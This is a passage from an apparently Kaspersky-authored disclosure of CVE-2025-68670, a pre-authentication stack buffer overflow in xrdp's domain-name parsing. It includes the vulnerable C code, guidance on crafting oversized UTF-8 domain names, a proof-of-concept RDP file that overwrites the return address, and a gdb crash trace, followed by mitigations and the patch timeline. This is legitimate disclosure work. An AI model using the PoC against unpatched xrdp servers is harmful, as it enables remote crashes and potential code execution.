char resultIP[256]; //
[7][..SNIP..]
combo->item_index = xrdp_wm_parse_domain_information(
self->session->client_info->domain, //
[6] combo->data_list->count, 1,
resultIP /* just a dummy place holder, we ignore
*/ );
As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.
static int
xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
{
int ret;
int pos;
int comboxindex;
char index[2];

/* If the first char in the domain name is '_' we use the domain name as IP*/
ret = 0; /* default return value */
/* resultBuffer assumed to be 256 chars */
g_memset(resultBuffer, 0, 256);
if (originalDomainInfo[0] == '_') //
[8] {
/* we try to locate a number indicating what combobox index the user
* prefer the information is loaded from domain field, from the client
* We must use valid chars in the domain name.
* Underscore is a valid name in the domain.
* Invalid chars are ignored in microsoft client therefore we use '_'
* again. this sec '__' contains the split for index.*/
pos = g_pos(&originalDomainInfo[1], "__"); //
[9] if (pos > 0)
{
/* an index is found we try to use it */
LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
if (decode)
{
[..SNIP..]
}
/ * pos limit the String to only contain the IP */
g_strncpy(resultBuffer, &originalDomainInfo[1], pos); //
[10] }
else
{
LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
}
}
return ret;
}
As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).

To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.

PoC


As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:
alternate full address:s:172.22.118.7
full address:s:172.22.118.7
domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
username:s:testuser
When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.
gef➤ bt
#0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
#1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
#2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at./nptl/pthread_kill.c:89
#3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
#4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
#5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
#6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
#7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
#8 0x000063654a2e5ad5 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x00007adb00000a00 in ?? ()
#11 0x0000000000050004 in ?? ()
#12 0x00007fff91732220 in ?? ()
#13 0x000000000000030a in ?? ()
#14 0xfffffffffffffff8 in ?? ()
#15 0x000000052dc71740 in ?? ()
#16 0x3030305f70647278 in ?? ()
#17 0x616d5f6130333030 in ?? ()
#18 0x00636e79735f6e69 in ?? ()
#19 0x0000000000000000 in ?? ()

Protection against vulnerability exploitation


It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.

The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.

Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.

Vulnerability remediation timeline


  • 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
  • 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
  • 12/15/2025: investigation and prioritization of the vulnerability began.
  • 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
  • 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
  • 01/27/2026: the patch was merged into the project’s main branch.


Conclusion


Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.

However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.

securelist.com/cve-2025-68670/…

  • 0
  • 0
  • 0
  • 21h ago

Bluesky

Profile picture fallback
~Kaspersky~ A pre-auth RCE flaw (CVE-2025-68670) in xrdp allows arbitrary code execution via a buffer overflow during domain name parsing. - IOCs: CVE-2025-68670 - #CVE202568670 #ThreatIntel #xrdp
  • 0
  • 0
  • 0
  • 16h ago
Showing 1 to 10 of 70 CVEs